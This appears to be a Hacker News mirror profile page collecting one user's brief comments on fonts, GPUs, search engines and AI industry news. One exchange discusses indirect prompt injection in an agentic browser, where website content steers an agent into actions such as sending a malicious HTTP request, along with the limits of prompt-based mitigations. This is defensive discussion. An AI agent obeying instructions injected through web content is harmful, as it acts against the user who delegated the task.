Readit News logoReadit News
rtrgrd commented on Two Slice, a font that's only 2px tall   joefatula.com/twoslice.ht... · Posted by u/JdeBP
rtrgrd · 3 months ago
Very cool - note that lowercase b, l and h are the same
rtrgrd commented on Intel Arc Pro B50 GPU Launched at $349 for Compact Workstations   guru3d.com/story/intel-ar... · Posted by u/qwytw
williamdclt · 3 months ago
I don't really know what I'm talking about (whether about graphic cards or in AI inference), but if someone figures out how to cut the compute needed for AI inference significantly then I'd guess the demand for graphic cards would suddenly drop?

Given how young and volatile this domain still is, it doesn't seem unreasonable to be wary of it. Big players (google, openai and the likes) are probably pouring tons of money into trying to do exactly that

rtrgrd · 3 months ago
I would suspect that for self hosted LLMs, quality >>> performance, so the newer releases will always expand to fill capacity of available hardware even when efficiency is improved.
rtrgrd commented on Novel hollow-core optical fiber transmits data faster with record low loss   phys.org/news/2025-09-hol... · Posted by u/Wingy
rtrgrd · 4 months ago
All the hedge funds sniping orders right now lol
rtrgrd commented on Use Bayes rule to mechanically solve probability riddles   cloud.disroot.org/s/Ec4xT... · Posted by u/zaik
rtrgrd · 4 months ago
Might be hug of death but the load times are horrifically slow.
rtrgrd commented on Agentic Browser Security: Indirect Prompt Injection in Perplexity Comet   brave.com/blog/comet-prom... · Posted by u/drak0n1c
veganmosfet · 4 months ago
As possible mitigation, they mention "The browser should distinguish between user instructions and website content". I don't see how this can be achieved in a reliable way with LLMs tbh. You can add fancy instructions (e.g., "You MUST NOT...") and delimiters (e.g., "<non_trusted>") and fine-tune the LLM but this is not reliable, since instructions and data are processed in the same context and in the same way. There are 100s of examples out there. The only reliable countermeasures are outside the LLMs but they restrain agent autonomy.
rtrgrd · 4 months ago
The blog mentions checking each agent action (say the agent was planning to send a malicious http request) against the user prompt for coherence; the attack vector exists but it should make the trivial versions of instruction injection harder
rtrgrd commented on Crimes with Python's Pattern Matching (2022)   hillelwayne.com/post/pyth... · Posted by u/agluszak
umgefahren · 4 months ago
Idk that doesn’t sound so dubious to me. ∅ might be more approachable for the PHDs then set() ;)
rtrgrd · 4 months ago
we all love non ascii code (cough emoji variable names)
rtrgrd commented on AI groups spend to replace low-cost 'data labellers' with high-paid experts   ft.com/content/e17647f0-4... · Posted by u/eisa01
Melonololoti · 5 months ago
Yepp it continues the gathering of more and better data.

Ai is not a hype. We have started to actually do something with all the data and this process will not stop soon.

Aline the RL what is now happening through human feedback alone (thumbs up/down) is massive.

rtrgrd · 5 months ago
I thought human preferences was typically considered a noisy reward signal
rtrgrd commented on How I Use Kagi   flamedfury.com/posts/how-... · Posted by u/moebrowne
rtrgrd · 5 months ago
I've never used Kagi before and wanted to try: how does Kagi stack up against Brave search?
rtrgrd commented on Cloudflare to introduce pay-per-crawl for AI bots   blog.cloudflare.com/intro... · Posted by u/scotchmi_st
boplicity · 6 months ago
Not sure how Google is winning AI, at least from the sophisticated consumer's perspective. Their AI overviews are often comically wrong. Sure, they may have Good APIs for their AI, and good technical quality for their AIs, but for the general user, their most common AI presentation is woefully bad.
rtrgrd · 6 months ago
I assume the high volume of search traffic forces Google to use a low quality model for AI overviews. Frontier Google models (e.g. Gemini 2.5 pro) are on-par, if not 'better', than leading models from other companies.

u/rtrgrd

KarmaCake day45October 12, 2024View Original